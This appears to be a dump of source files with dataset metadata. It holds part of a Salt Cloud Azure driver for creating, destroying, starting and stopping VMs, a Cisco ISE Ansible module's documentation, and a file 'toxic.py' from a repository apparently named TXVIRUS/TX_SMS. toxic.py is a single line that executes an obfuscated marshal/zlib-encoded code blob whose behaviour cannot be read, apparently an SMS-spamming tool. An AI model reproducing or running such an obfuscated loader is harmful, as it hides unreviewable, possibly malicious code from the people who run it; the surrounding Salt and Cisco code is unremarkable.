vm_create = compconn.virtual_machines.create_or_update(
resource_group_name=vm_['resource_group'],
vm_name=vm_['name'],
parameters=params
)
vm_create.wait()
vm_result = vm_create.result()
vm_result = vm_result.as_dict()
if custom_extension:
create_or_update_vmextension(kwargs=custom_extension)
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('compute', exc.message)
vm_result = {}
return vm_result
def create(vm_):
'''
Create a single VM from a data dict.
'''
try:
if vm_['profile'] and config.is_profile_configured(
__opts__,
__active_provider_name__ or 'azurearm',
vm_['profile'],
vm_=vm_
) is False:
return False
except AttributeError:
pass
if vm_.get('bootstrap_interface') is None:
vm_['bootstrap_interface'] = 'public'
__utils__['cloud.fire_event'](
'event',
'starting create',
'salt/cloud/{0}/creating'.format(vm_['name']),
args=__utils__['cloud.filter_event'](
'creating', vm_, ['name', 'profile', 'provider', 'driver']
),
sock_dir=__opts__['sock_dir'],
transport=__opts__['transport']
)
__utils__['cloud.cachedir_index_add'](
vm_['name'], vm_['profile'], 'azurearm', vm_['driver']
)
if not vm_.get('location'):
vm_['location'] = get_location(kwargs=vm_)
log.info('Creating Cloud VM %s in %s', vm_['name'], vm_['location'])
vm_request = request_instance(vm_=vm_)
if not vm_request or 'error' in vm_request:
err_message = 'Error creating VM {0}! ({1})'.format(vm_['name'], six.text_type(vm_request))
log.error(err_message)
raise SaltCloudSystemExit(err_message)
def _query_node_data(name, bootstrap_interface):
'''
Query node data.
'''
data = show_instance(name, call='action')
ip_address = None
if len(data.keys()) == 0:
return False
if bootstrap_interface == 'public':
ip_address = data['public_ips'][0]
if bootstrap_interface == 'private':
ip_address = data['private_ips'][0]
if ip_address is None:
return False
return ip_address
try:
data = salt.utils.cloud.wait_for_ip(
_query_node_data,
update_args=(vm_['name'], vm_['bootstrap_interface'],),
timeout=config.get_cloud_config_value(
'wait_for_ip_timeout', vm_, __opts__, default=10 * 60),
interval=config.get_cloud_config_value(
'wait_for_ip_interval', vm_, __opts__, default=10),
interval_multiplier=config.get_cloud_config_value(
'wait_for_ip_interval_multiplier', vm_, __opts__, default=1),
)
except (
SaltCloudExecutionTimeout,
SaltCloudExecutionFailure,
SaltCloudSystemExit
) as exc:
try:
log.warning(exc)
finally:
raise SaltCloudSystemExit(six.text_type(exc))
vm_['ssh_host'] = data
if not vm_.get('ssh_username'):
vm_['ssh_username'] = config.get_cloud_config_value(
'ssh_username', vm_, __opts__
)
vm_['password'] = config.get_cloud_config_value(
'ssh_password', vm_, __opts__
)
ret = __utils__['cloud.bootstrap'](vm_, __opts__)
data = show_instance(vm_['name'], call='action')
log.info('Created Cloud VM \'%s\'', vm_['name'])
log.debug(
'\'%s\' VM creation details:\n%s',
vm_['name'],
pprint.pformat(data)
)
ret.update(data)
__utils__['cloud.fire_event'](
'event',
'created instance',
'salt/cloud/{0}/created'.format(vm_['name']),
args=__utils__['cloud.filter_event'](
'created',
vm_, ['name', 'profile', 'provider', 'driver']
),
sock_dir=__opts__['sock_dir'],
transport=__opts__['transport']
)
return ret
def destroy(name, call=None, kwargs=None): # pylint: disable=unused-argument
'''
Destroy a VM.
CLI Examples:
.. code-block:: bash
salt-cloud -d myminion
salt-cloud -a destroy myminion service_name=myservice
'''
if kwargs is None:
kwargs = {}
if call == 'function':
raise SaltCloudSystemExit(
'The destroy action must be called with -d, --destroy, '
'-a or --action.'
)
compconn = get_conn(client_type='compute')
node_data = show_instance(name, call='action')
if node_data['storage_profile']['os_disk'].get('managed_disk'):
vhd = node_data['storage_profile']['os_disk']['managed_disk']['id']
else:
vhd = node_data['storage_profile']['os_disk']['vhd']['uri']
ret = {name: {}}
log.debug('Deleting VM')
result = compconn.virtual_machines.delete(node_data['resource_group'], name)
result.wait()
if __opts__.get('update_cachedir', False) is True:
__utils__['cloud.delete_minion_cachedir'](
name,
__active_provider_name__.split(':')[0],
__opts__
)
cleanup_disks = config.get_cloud_config_value(
'cleanup_disks',
get_configured_provider(),
__opts__,
search_global=False,
default=False,
)
if cleanup_disks:
cleanup_vhds = kwargs.get(
'delete_vhd',
config.get_cloud_config_value(
'cleanup_vhds',
get_configured_provider(),
__opts__,
search_global=False,
default=False
)
)
if cleanup_vhds:
log.debug('Deleting vhd')
comps = vhd.split('/')
container = comps[-2]
blob = comps[-1]
ret[name]['delete_disk'] = {
'delete_disks': cleanup_disks,
'delete_vhd': cleanup_vhds,
'container': container,
'blob': blob,
}
if vhd.startswith('http'):
ret[name]['data'] = delete_blob(
kwargs={'container': container, 'blob': blob},
call='function'
)
else:
ret[name]['data'] = delete_managed_disk(
kwargs={'resource_group': node_data['resource_group'],
'container': container,
'blob': blob},
call='function'
)
cleanup_data_disks = kwargs.get(
'delete_data_disks',
config.get_cloud_config_value(
'cleanup_data_disks',
get_configured_provider(),
__opts__,
search_global=False,
default=False
)
)
if cleanup_data_disks:
log.debug('Deleting data_disks')
ret[name]['data_disks'] = {}
for disk in node_data['storage_profile']['data_disks']:
datavhd = disk.get('managed_disk', {}).get('id') or disk.get('vhd', {}).get('uri')
comps = datavhd.split('/')
container = comps[-2]
blob = comps[-1]
ret[name]['data_disks'][disk['name']] = {
'delete_disks': cleanup_disks,
'delete_vhd': cleanup_vhds,
'container': container,
'blob': blob,
}
if datavhd.startswith('http'):
ret[name]['data'] = delete_blob(
kwargs={'container': container, 'blob': blob},
call='function'
)
else:
ret[name]['data'] = delete_managed_disk(
kwargs={'resource_group': node_data['resource_group'],
'container': container,
'blob': blob},
call='function'
)
cleanup_interfaces = config.get_cloud_config_value(
'cleanup_interfaces',
get_configured_provider(),
__opts__,
search_global=False,
default=False
)
if cleanup_interfaces:
ret[name]['cleanup_network'] = {
'cleanup_interfaces': cleanup_interfaces,
'resource_group': node_data['resource_group'],
'data': [],
}
ifaces = node_data['network_profile']['network_interfaces']
for iface in ifaces:
resource_group = iface['id'].split('/')[4]
ret[name]['cleanup_network']['data'].append(
delete_interface(
kwargs={
'resource_group': resource_group,
'iface_name': iface['name'],
},
call='function',
)
)
return ret
def list_storage_accounts(call=None):
'''
List storage accounts within the subscription.
'''
if call == 'action':
raise SaltCloudSystemExit(
'The list_storage_accounts function must be called with '
'-f or --function'
)
storconn = get_conn(client_type='storage')
ret = {}
try:
accounts_query = storconn.storage_accounts.list()
accounts = __utils__['azurearm.paged_object_to_list'](accounts_query)
for account in accounts:
ret[account['name']] = account
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('storage', exc.message)
ret = {'Error': exc.message}
return ret
def _get_cloud_environment():
'''
Get the cloud environment object.
'''
cloud_environment = config.get_cloud_config_value(
'cloud_environment',
get_configured_provider(), __opts__, search_global=False
)
try:
cloud_env_module = importlib.import_module('msrestazure.azure_cloud')
cloud_env = getattr(cloud_env_module, cloud_environment or 'AZURE_PUBLIC_CLOUD')
except (AttributeError, ImportError):
raise SaltCloudSystemExit(
'The azure {0} cloud environment is not available.'.format(cloud_environment)
)
return cloud_env
def _get_block_blob_service(kwargs=None):
'''
Get the block blob storage service.
'''
resource_group = kwargs.get('resource_group') or config.get_cloud_config_value(
'resource_group',
get_configured_provider(), __opts__, search_global=False
)
sas_token = kwargs.get('sas_token') or config.get_cloud_config_value(
'sas_token',
get_configured_provider(), __opts__, search_global=False
)
storage_account = kwargs.get('storage_account') or config.get_cloud_config_value(
'storage_account',
get_configured_provider(), __opts__, search_global=False
)
storage_key = kwargs.get('storage_key') or config.get_cloud_config_value(
'storage_key',
get_configured_provider(), __opts__, search_global=False
)
if not resource_group:
raise SaltCloudSystemExit(
'A resource group must be specified'
)
if not storage_account:
raise SaltCloudSystemExit(
'A storage account must be specified'
)
if not storage_key:
storconn = get_conn(client_type='storage')
storage_keys = storconn.storage_accounts.list_keys(resource_group, storage_account)
storage_keys = {v.key_name: v.value for v in storage_keys.keys}
storage_key = next(six.itervalues(storage_keys))
cloud_env = _get_cloud_environment()
endpoint_suffix = cloud_env.suffixes.storage_endpoint
return BlockBlobService(storage_account, storage_key,
sas_token=sas_token,
endpoint_suffix=endpoint_suffix)
def list_blobs(call=None, kwargs=None): # pylint: disable=unused-argument
'''
List blobs.
'''
if kwargs is None:
kwargs = {}
if 'container' not in kwargs:
raise SaltCloudSystemExit(
'A container must be specified'
)
storageservice = _get_block_blob_service(kwargs)
ret = {}
try:
for blob in storageservice.list_blobs(kwargs['container']).items:
ret[blob.name] = {
'blob_type': blob.properties.blob_type,
'last_modified': blob.properties.last_modified.isoformat(),
'server_encrypted': blob.properties.server_encrypted,
}
except Exception as exc:
log.warning(six.text_type(exc))
return ret
def delete_blob(call=None, kwargs=None): # pylint: disable=unused-argument
'''
Delete a blob from a container.
'''
if kwargs is None:
kwargs = {}
if 'container' not in kwargs:
raise SaltCloudSystemExit(
'A container must be specified'
)
if 'blob' not in kwargs:
raise SaltCloudSystemExit(
'A blob must be specified'
)
storageservice = _get_block_blob_service(kwargs)
storageservice.delete_blob(kwargs['container'], kwargs['blob'])
return True
def delete_managed_disk(call=None, kwargs=None): # pylint: disable=unused-argument
'''
Delete a managed disk from a resource group.
'''
compconn = get_conn(client_type='compute')
try:
compconn.disks.delete(kwargs['resource_group'], kwargs['blob'])
except Exception as exc:
log.error('Error deleting managed disk %s - %s', kwargs.get('blob'), six.text_type(exc))
return False
return True
def list_virtual_networks(call=None, kwargs=None):
'''
List virtual networks.
'''
if kwargs is None:
kwargs = {}
if call == 'action':
raise SaltCloudSystemExit(
            'The list_virtual_networks function must be called with '
'-f or --function'
)
netconn = get_conn(client_type='network')
resource_groups = list_resource_groups()
ret = {}
for group in resource_groups:
try:
networks = netconn.virtual_networks.list(
resource_group_name=group
)
except CloudError:
networks = {}
for network_obj in networks:
network = network_obj.as_dict()
ret[network['name']] = network
ret[network['name']]['subnets'] = list_subnets(
kwargs={'resource_group': group, 'network': network['name']}
)
return ret
def list_subnets(call=None, kwargs=None):
'''
List subnets in a virtual network.
'''
if kwargs is None:
kwargs = {}
if call == 'action':
raise SaltCloudSystemExit(
            'The list_subnets function must be called with '
'-f or --function'
)
netconn = get_conn(client_type='network')
resource_group = kwargs.get('resource_group') or config.get_cloud_config_value(
'resource_group',
get_configured_provider(), __opts__, search_global=False
)
if not resource_group and 'group' in kwargs and 'resource_group' not in kwargs:
resource_group = kwargs['group']
if not resource_group:
raise SaltCloudSystemExit(
'A resource group must be specified'
)
if kwargs.get('network') is None:
kwargs['network'] = config.get_cloud_config_value(
'network', get_configured_provider(), __opts__, search_global=False
)
if 'network' not in kwargs or kwargs['network'] is None:
raise SaltCloudSystemExit(
'A "network" must be specified'
)
ret = {}
subnets = netconn.subnets.list(resource_group, kwargs['network'])
for subnet in subnets:
ret[subnet.name] = subnet.as_dict()
ret[subnet.name]['ip_configurations'] = {}
for ip_ in subnet.ip_configurations:
comps = ip_.id.split('/')
name = comps[-1]
ret[subnet.name]['ip_configurations'][name] = ip_.as_dict()
ret[subnet.name]['ip_configurations'][name]['subnet'] = subnet.name
ret[subnet.name]['resource_group'] = resource_group
return ret
def create_or_update_vmextension(call=None, kwargs=None): # pylint: disable=unused-argument
'''
.. versionadded:: Fluorine
Create or update a VM extension object "inside" of a VM object.
required kwargs:
.. code-block:: yaml
extension_name: myvmextension
virtual_machine_name: myvm
settings: {"commandToExecute": "hostname"}
optional kwargs:
.. code-block:: yaml
resource_group: < inferred from cloud configs >
location: < inferred from cloud configs >
publisher: < default: Microsoft.Azure.Extensions >
virtual_machine_extension_type: < default: CustomScript >
type_handler_version: < default: 2.0 >
auto_upgrade_minor_version: < default: True >
protected_settings: < default: None >
'''
if kwargs is None:
kwargs = {}
if 'extension_name' not in kwargs:
raise SaltCloudSystemExit(
'An extension name must be specified'
)
if 'virtual_machine_name' not in kwargs:
raise SaltCloudSystemExit(
'A virtual machine name must be specified'
)
compconn = get_conn(client_type='compute')
# pylint: disable=invalid-name
VirtualMachineExtension = getattr(
compute_models, 'VirtualMachineExtension'
)
resource_group = kwargs.get('resource_group') or config.get_cloud_config_value(
'resource_group',
get_configured_provider(), __opts__, search_global=False
)
if not resource_group:
raise SaltCloudSystemExit(
'A resource group must be specified'
)
location = kwargs.get('location') or get_location()
if not location:
raise SaltCloudSystemExit(
'A location must be specified'
)
publisher = kwargs.get('publisher', 'Microsoft.Azure.Extensions')
virtual_machine_extension_type = kwargs.get('virtual_machine_extension_type', 'CustomScript')
type_handler_version = kwargs.get('type_handler_version', '2.0')
auto_upgrade_minor_version = kwargs.get('auto_upgrade_minor_version', True)
settings = kwargs.get('settings', {})
protected_settings = kwargs.get('protected_settings')
if not isinstance(settings, dict):
raise SaltCloudSystemExit(
'VM extension settings are not valid'
)
elif 'commandToExecute' not in settings and 'script' not in settings:
raise SaltCloudSystemExit(
'VM extension settings are not valid. Either commandToExecute or script must be specified.'
)
log.info('Creating VM extension %s', kwargs['extension_name'])
ret = {}
try:
params = VirtualMachineExtension(
location=location,
publisher=publisher,
virtual_machine_extension_type=virtual_machine_extension_type,
type_handler_version=type_handler_version,
auto_upgrade_minor_version=auto_upgrade_minor_version,
settings=settings,
protected_settings=protected_settings
)
poller = compconn.virtual_machine_extensions.create_or_update(
resource_group,
kwargs['virtual_machine_name'],
kwargs['extension_name'],
params
)
ret = poller.result()
ret = ret.as_dict()
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('compute', 'Error attempting to create the VM extension: {0}'.format(exc.message))
ret = {'error': exc.message}
return ret
def stop(name, call=None):
'''
.. versionadded:: Fluorine
Stop (deallocate) a VM
CLI Examples:
.. code-block:: bash
salt-cloud -a stop myminion
'''
if call == 'function':
raise SaltCloudSystemExit(
'The stop action must be called with -a or --action.'
)
compconn = get_conn(client_type='compute')
resource_group = config.get_cloud_config_value(
'resource_group',
get_configured_provider(), __opts__, search_global=False
)
ret = {}
if not resource_group:
groups = list_resource_groups()
for group in groups:
try:
instance = compconn.virtual_machines.deallocate(
vm_name=name,
resource_group_name=group
)
instance.wait()
vm_result = instance.result()
ret = vm_result.as_dict()
break
except CloudError as exc:
if 'was not found' in exc.message:
continue
else:
ret = {'error': exc.message}
if not ret:
__utils__['azurearm.log_cloud_error']('compute', 'Unable to find virtual machine with name: {0}'.format(name))
ret = {'error': 'Unable to find virtual machine with name: {0}'.format(name)}
else:
try:
instance = compconn.virtual_machines.deallocate(
vm_name=name,
resource_group_name=resource_group
)
instance.wait()
vm_result = instance.result()
ret = vm_result.as_dict()
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('compute', 'Error attempting to stop {0}: {1}'.format(name, exc.message))
ret = {'error': exc.message}
return ret
def start(name, call=None):
'''
.. versionadded:: Fluorine
Start a VM
CLI Examples:
.. code-block:: bash
salt-cloud -a start myminion
'''
if call == 'function':
raise SaltCloudSystemExit(
'The start action must be called with -a or --action.'
)
compconn = get_conn(client_type='compute')
resource_group = config.get_cloud_config_value(
'resource_group',
get_configured_provider(), __opts__, search_global=False
)
ret = {}
if not resource_group:
groups = list_resource_groups()
for group in groups:
try:
instance = compconn.virtual_machines.start(
vm_name=name,
resource_group_name=group
)
instance.wait()
vm_result = instance.result()
ret = vm_result.as_dict()
break
except CloudError as exc:
if 'was not found' in exc.message:
continue
else:
ret = {'error': exc.message}
if not ret:
__utils__['azurearm.log_cloud_error']('compute', 'Unable to find virtual machine with name: {0}'.format(name))
ret = {'error': 'Unable to find virtual machine with name: {0}'.format(name)}
else:
try:
instance = compconn.virtual_machines.start(
vm_name=name,
resource_group_name=resource_group
)
instance.wait()
vm_result = instance.result()
ret = vm_result.as_dict()
except CloudError as exc:
__utils__['azurearm.log_cloud_error']('compute', 'Error attempting to start {0}: {1}'.format(name, exc.message))
ret = {'error': exc.message}
return ret
| 32.503318
| 128
| 0.582485
|
23b3a28a0aeac86092ba9f4c83f6710b7085a977
| 5,716
|
py
|
Python
|
toxic.py
|
TXVIRUS/TX_SMS
|
6715eaeef7cb87e0399c6eff0cb0537a9cee528b
|
[
"MIT"
] | null | null | null |
toxic.py
|
TXVIRUS/TX_SMS
|
6715eaeef7cb87e0399c6eff0cb0537a9cee528b
|
[
"MIT"
] | null | null | null |
toxic.py
|
TXVIRUS/TX_SMS
|
6715eaeef7cb87e0399c6eff0cb0537a9cee528b
|
[
"MIT"
] | null | null | null |
#Compiled By Mohammad Alamin
#https://github.com/AK27HBD/
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xee\x06\x00\x00x\x9c\x9dWM\x97\xaaH\x12\xdd\xf7\xafx\xe7\xcc\xa2\xbb7s\x00\xf5\xcd\xb0\x14,0Q,\x01I>vd\xa6\r\x08\x89L)(\xfc\xfa\x89\x04\xb5\xaa|S=\xddo\x91\xa7,L"#\xee\xbdq3\xfc\x87~\xe4u^\xee\xd97\xfb\x98%\x9c\'\xec\xdb\xbcLx^\xfd\x92\xf3\xfa\xf8v\xfeF\x92\xd3\xfe\xfb\xf4\x97\xfduO\x7f\x1b?\xff\x93|\x9f\xb2==\xb2\xfdo\xe4W\xd4\xd9\x07\xb1\xbc@\xbe\x90\x89%%\xc1\xacB/r\x1b/\xf1)\x0e\xedUr{\x8e\x96VIC\\\xd2\x89\xdb\xeb<\xee\x88"\xa5\x94\xe3+\x0bp\xcf\x96v\x03\xcf;\x16l$\x16\xc2\xbeN\xabI\xa8\xb5\xb4rRG1\xfa\xd8/\x1b\xaa`X\xa5\x94\x84q\xe9\x9a\xe5\x81\xcd\xeb"\x0e\xa2\x14\xce\x93(\xff\xf7q\xb5;\xae\x90\xaeq\x88\xf1\x86\x16R\xba\xd2-j/\xec>\xe8\x8ds\xb8\x98\xf7\xb6|\xeam.\xefv\xd8N\x9dB\xdd8\x05\xf6\xd0\x8b\x15#\xc3\xdd\x06/\xe5b\x8dc\xcb/\xf1.4g\xcb$t\x8f,@\xe9k\xae\x1d\xd9\xd2\xbd\xd0\xfe\xd8\xae\x15V33\x93\xa3|v\x80\xdc[ld\x81\x87-\xec\xcb\xd7\x06\x9bPk\xc0\xba(\x90\xee\xef\x9c\x86w&NC\x02\xbfe\xcbLIBK\xa6\xb0\xd7\x87\x1abo\xfe\x1d\x99\x99\xc4\x96\xf3\xef\xebN\x95\xf6\xcb\xb8\xa6\x15\xee\xd7\xdcx\x83\xcf\x19\xf3fgb\\\x1b\x97\x1b\x878\xb0Z\xa2\x9c>\xe72a\x13\xd6\xcdx\x14l\xca\x88\xabm\xd2\x8d9\xb1\x856M\x82\xcd\xe3\xac]\xa0\x1e\xa3@>G\x01\xe0\x18\\3\x12\x94\xcd\xdf\x8e\xd3\xa1Z\xcf\xe7)]Z5\xa9\x9cc\\\xe1C\xd2\x15\x02\xeb\x0b\xe5e\xc3\xf44G\xb9\xf8\x7f>\xac\xfb>T^\x1b\xf1\xfc\xc1\x8fS\x7f\xde?\xe8f\xb3\x8cC\xf7\xa6\x19\xe0x\x89%\xe0\xde\xa4\\=#\x03\xf7q\x88V\xa4\xc2\xe7\x88\xe3Np*4\xb22\xc7}\xef\xfcjw~\xaf\xc4\xc7\r3a\xaf\x11\xd7\xd1\xc4\xad\x89\xa7\xbd\xb2@\xce!\x0e\xe07\xcfW^\xb1\x02<Z\x069\x89x"\xb7\x0f\xf1\x0cR\xb9%\xcd\xb5\x1d\tA#\x8f}\xc7\x14\xf2\xad\xf5\xf4x\xb8k\x1d\x87\xd6\xc9vj\x99\xf2K\xba\xf5\xe6y\xb2t%\xba\xb4\x05\x97\x195\x8b\xc6\xdeig\x88-C.}\xa4d\xc0\xdf\xa5\x89\x14\xf5\xbcV\xaeg\xda\xc9\x19\x03}\xad\xc3MI+\xc8S\xf1\xdb(\xd4\xea\xf5$\x92\xd6\x8a\x01\xef\xa4-\x13\xdf\x15x\x9a\x84\x1b\xc0\x03\xad\x12\x13g1\xd4E\xbb\xb9\x8a^6\x19\xf4\x82E\xaaM\t\x0b4Y*\xb1\xefB\xbd\x8e\xc0\xf8\x18\x07F\x11\x87V\x1ft\xd6\x82(3)\x86\x1a\xd6\xd8\x9dQ\xd3\xcfC\x0f\xde\xd7\xad\x8c.\xb5\x13\xf0\x9b\xc1\xbb-\xc9\xd5\xffPEmPZ\x17Q\xe8f\x02\x17kr\xca!_\xc0\xd280\x1d}G:\xaaV\xcaL&\x01\xf4f~\xaaP~\xc9\xd9\xb2\xbc\xc4\x9e\xf8\xce\xba$\xa6\xda\xc4\x9e\xa5Z\x97\xe3\x8dW\xbb@\x13\xdc\x91\x05Z1\x81U>\x9c\xfbQwe\x94\xcb\x03V\x11h"V\xfc&\xaa\xf0\xf7}>\xe0\xd7\xb2\x03j\xc9\xc4\xbd\xac\'P#wr\x9dge\x14\x007\x95=\xe8\xe0KO\xd0\xd3\xfa\xe3\xde\x9f\xc5`\xcc\x97\xfd\x0bU\xda\x11\xde/\xd1Ah\xe04}\xd5\xe9\xdb]\x8f\xab\x8e\xe6\x7fxt\xa5\xe7\xf6M\x17\x1b\xa1\x87^\xafD\xdd\xf6\xb3.\xa0\xd3\xa8\xa8\xb5\xa5\xca\xa6\xa5\xe0\x17"\xe75\xdf\xb4\xc4SK8\xffD\xc0_\xe0o\x0f\xb9\x16\xeb@\x95\xe8B\x1dq\xddIp.\xfap.\xe2d\xa2\x95\x94\x1b\x12\x99 
5\xe2\xceY`\x85\xd2\x07\xf6\x87\x11{g\xc0~\xa3?a\xaf\x18\x97\xc4\x9b\xe5PWE:\xb9\'\xcaU\x1e0\xa8\xec\x9bFG\r\x0e\x9aT\xaem\xac\x94\xcd\x8d\x87\xdb9\xef\x1a\x1bb\xffE=n\x8cS\xee\x0c\x9a\x82\x1e\xd5e\x7f\x1fj%*\xa5\x01\'8\xebB\x80?\xc0\xbe&\xca\xb4M*\xc0%G\xab\xd84\xa4h\xe7\x88=\xd5\xbe\xb3\x04n\x1d\xecii>\xe8.#\xe6%_\xeb\xf3\x9c\x84\x9b\x9a*n3\xf0tH\xa7Vwnn}\xfffu\x9fty\xc3\xc6\x1f\xb1\xf1~\xc0F\xd4\xde\xc4f\x06^i\xbcE\xe1\xe6\x08X_\x84?\xdd\xb8\x1a\xf4\xf9\x03\x0e\xde\xdf\xc0\x01\xff,\x0e\xfe\x1d\x87Q\x17\xfe\xbd\x1f\x87\xfe|{]\xa4\x9f{\xb4\x92*\xfd\x07MDc\xdd\xcf\xfd\xa8\xc42\xe1\xd03J:j\x80[\xc5\xa8\x13u\xf4*\x85\x01\xff\x03\xf6\xe5Nv\x9d\xed\xe4\xee]\xf8\x8fD\xc1\xb3\xad\xf7\xc1\xa3\xfa\x08\xf2\xd4\x16\x80]\xe9\x053\xa1\xe7\x1e\xee\xd3\x9aq\xfc\x02\xfd\x06>[\xbc\xef\x95\x7f\x16\x8b\xe8\x8e\xc5\x19\xfa\xbf\x8f\xcdi.\xfc\xfd\xff\xf3N\xc7\xfa\xbb\xff\xd9\x13]\x1c\xb8\xd3\x91\xe7Y\x1e\xeb\xaab{\xaa\x0c\x9cv\xa0\xff:\x06l\xa9\xfe\xb1N\xfa\xd7\xeb\xec\x19A\x05\xc4\x85\xfb\x05\xee\xc63\x1e\xbc\xd3b\xc2\xcb\x107.\xd4\xbc\x02\x96\x06\xdc\x83j\xb3Vj\xe8\xc9)x\x9e\x0b\xde\xf42\xb9\xfb1\xe1\xc6y\xf4\xdb\x1f\xbc8\xbd\xfb\xd4\xee~W\x0e~\xf5\xd9\xabD\x9f\x88Z\x18/\x0f7\xdf\x1e\xea\xbd\xe9\xe4\xf0\x19\xa7t\xc0\xe9\xf5\xd9;\xc6y\xa1O\x96\x0c\xfa`\xd6\xdez"\x84\x19E\xf3_\x8a\xd6\x91\xad\x8d\x03\xb5\x83\xb7\xdd}5\x88\x82k-8\x8bw\xea"1\x8d\x06tt\xdab\xcaE\x0f\x89\xfd\xe3\x0cXB.\x8e\x1as\xe3D\x15\x7f\xf8.\xf67\xdb]8\xcc\x8c5\xec)\xb6\xa1\x98\x0f}N\x15\xb9\xa7\xca\xac\x88\xc0\xd7\xb7\xbbt\x8c\xc3\xe1>\x08\\{\xf0\xd0\x83\x0c\xf3\xcc\xb5\x8f\xbd\xd8&\x932#Kw\xe6/\xad\x16\xea\x86\xfeC\xaaU\xc8-\xf8\xf0\t\xfag\x0b\xba\xfd\xe4\xab\xa0}\x198\xea\xf6x\xc4\x13\xb4Y\x80\xff\x8a\xde\xe2.W;\xf0\x04i\x1bd\x12\t.\xf9\x03\xb3\xc9\xfb\\\x8b\xf4\x88\x0fs\xeeDk\x85\x0f\xd0K\r\xf9\xa14\xf1`\x9e\xcd5\x98\x0fg\x15\xcc~\xc7\xfb\x0cr\x9bY\x1fs\xd1\x879\xd5!\xa0\x1d\xc0"\xc5\x8aQ3]\xb3\x98\xcezd<\xce\xaa\t\xa7\xe9\xab\xae\x01\x0fe\xbf\xce\xa7\x8dX\xc83(\xf4\xc88\xafq\xdcS\xc1\xdf\x87\xb9{]\xc1L\r~$\xb8]\xeb\xda\xc3\x93\xa0\xa6\xfb\x9dyB\xe6\xa0;u\xe83\xef>\xd7i]\x1cn.\xc3\xbd\xf8E<\x1bt\xf8\xaew\xf9\x11[<\x1f{V\xbe\xdd\xadO1\xbb\xa7\x98\x9c\x95L\xcf\x86\xbbt\xe5\x80\x8e\xe7\xb0\x06L\xe7\xc3\xcc\xf6\xe97\x83\xa9\xf6\xb7\xbd\xd2\x17\xf5\x88\xe7\xc3\xb9\xdb`\xa8Kz\x8a)\xffIL\xf9\x8b\x98\xf2SL\xf9)\xa6\xf2\'1\x95/b*O1\x15\x11\xf3\xc1\xe3b\xf0\x1a\xc0\xcb\x90\xe3a&\x9c\xc1o*\xf0\x98\xe5\xe0i\xc0\xd9#\x8e\xfa\xc1\x9f>s\xb9\xa3\x83.\xdec\xa6\xcf1\xab8\x1c\xb9|\xd5\x8b\xaft9\xfc~\xf2\x0b\xecb\x1f\xef\xb0\x01\x9f%\xfc\x8a\xf5Q\x7f\xb02\xe4\xa1\xfa\xd7\xdf\x7f\xff/3\xe1\xea\xcd)\x03\xda\x04zlib\xda\x04exec\xda\ndecompress\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x17AK27HBD\nMohammad Alamin\xda\x08<module>\x01\x00\x00\x00s\x04\x00\x00\x00\x08\x01\x12\x01'))
| 1,429
| 5,643
| 0.737229
|
2204a9a7ef79e24dcad3f62f9ff36759dfefe6d9
| 3,280
|
py
|
Python
|
venv/lib/python3.8/site-packages/ansible_collections/cisco/ise/plugins/modules/sms_provider_info.py
|
saeedya/docker-ansible
|
6fb0cfc6bc4a5925b21380952a5a4502ec02119a
|
[
"Apache-2.0"
] | null | null | null |
venv/lib/python3.8/site-packages/ansible_collections/cisco/ise/plugins/modules/sms_provider_info.py
|
saeedya/docker-ansible
|
6fb0cfc6bc4a5925b21380952a5a4502ec02119a
|
[
"Apache-2.0"
] | null | null | null |
venv/lib/python3.8/site-packages/ansible_collections/cisco/ise/plugins/modules/sms_provider_info.py
|
saeedya/docker-ansible
|
6fb0cfc6bc4a5925b21380952a5a4502ec02119a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2021, Cisco Systems
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)
DOCUMENTATION = r"""
---
module: sms_provider_info
short_description: Information module for Sms Provider
description:
- Get all Sms Provider.
version_added: '1.0.0'
extends_documentation_fragment:
- cisco.ise.module_info
author: Rafael Campos (@racampos)
options:
page:
description:
- Page query parameter. Page number.
type: int
size:
description:
- Size query parameter. Number of objects returned per page.
type: int
sortasc:
description:
- Sortasc query parameter. Sort asc.
type: str
sortdsc:
description:
- Sortdsc query parameter. Sort desc.
type: str
filter:
description:
- >
Filter query parameter. <br/> **Simple filtering** should be available through the filter query string
parameter. The structure of a filter is a triplet of field, operator, and value separated with dots. More than
one filter can be sent. The logical operator common to ALL filter criteria will be by default AND, and can
be changed by using the "filterType=or" query string parameter. Each resource Data model description should
specify if an attribute is a filtered field. <br/> Operator | Description <br/>
------------|----------------- <br/> EQ | Equals <br/> NEQ | Not Equals <br/> GT | Greater Than <br/> LT |
Less Than <br/> STARTSW | Starts With <br/> NSTARTSW | Not Starts With <br/> ENDSW | Ends With <br/> NENDSW
| Not Ends With <br/> CONTAINS | Contains <br/> NCONTAINS | Not Contains <br/>.
type: list
filterType:
description:
- >
FilterType query parameter. The logical operator common to ALL filter criteria will be by default AND, and
can be changed by using this parameter (e.g. filterType=or).
type: str
requirements:
- ciscoisesdk >= 1.1.0
- python >= 3.5
seealso:
# Reference by Internet resource
- name: Sms Provider reference
description: Complete reference of the Sms Provider object model.
link: https://ciscoisesdk.readthedocs.io/en/latest/api/api.html#v3-0-0-summary
"""
EXAMPLES = r"""
- name: Get all Sms Provider
cisco.ise.sms_provider_info:
ise_hostname: "{{ise_hostname}}"
ise_username: "{{ise_username}}"
ise_password: "{{ise_password}}"
ise_verify: "{{ise_verify}}"
page: 1
size: 20
sortasc: string
sortdsc: string
filter: []
filterType: AND
register: result
"""
RETURN = r"""
ise_response:
description: A dictionary or list with the response returned by the Cisco ISE Python SDK
returned: always
type: list
elements: dict
sample: >
[
{
"id": "string",
"name": "string",
"link": {
"rel": "string",
"href": "string",
"type": "string"
}
}
]
ise_responses:
description: A dictionary or list with the response returned by the Cisco ISE Python SDK
returned: always
version_added: "1.1.0"
type: list
elements: dict
sample: >
[
{
"id": "string",
"name": "string",
"link": {
"rel": "string",
"href": "string",
"type": "string"
}
}
]
"""
| 28.034188
| 114
